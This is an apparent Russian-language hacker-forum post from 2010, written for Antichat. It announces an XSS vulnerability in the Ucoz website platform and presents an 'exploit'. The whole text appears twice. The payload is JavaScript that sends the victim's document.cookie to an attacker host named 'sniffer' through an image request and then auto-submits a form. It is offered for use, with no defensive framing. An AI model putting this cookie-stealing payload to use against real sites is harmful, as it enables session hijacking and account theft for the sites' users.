%R00tKit%
26.08.2010, 17:32
Программа: Ucoz
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
Code:
img = new Image(); img.src = "http://sniffer/images/s.gif?"+document.cookie;
document.main.submit();
____________________________________
(C) %R00tKit% специально для Античата
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
Code:
img = new Image(); img.src = "http://sniffer/images/s.gif?"+document.cookie;
document.main.submit();
____________________________________
(C) %R00tKit% специально для Античата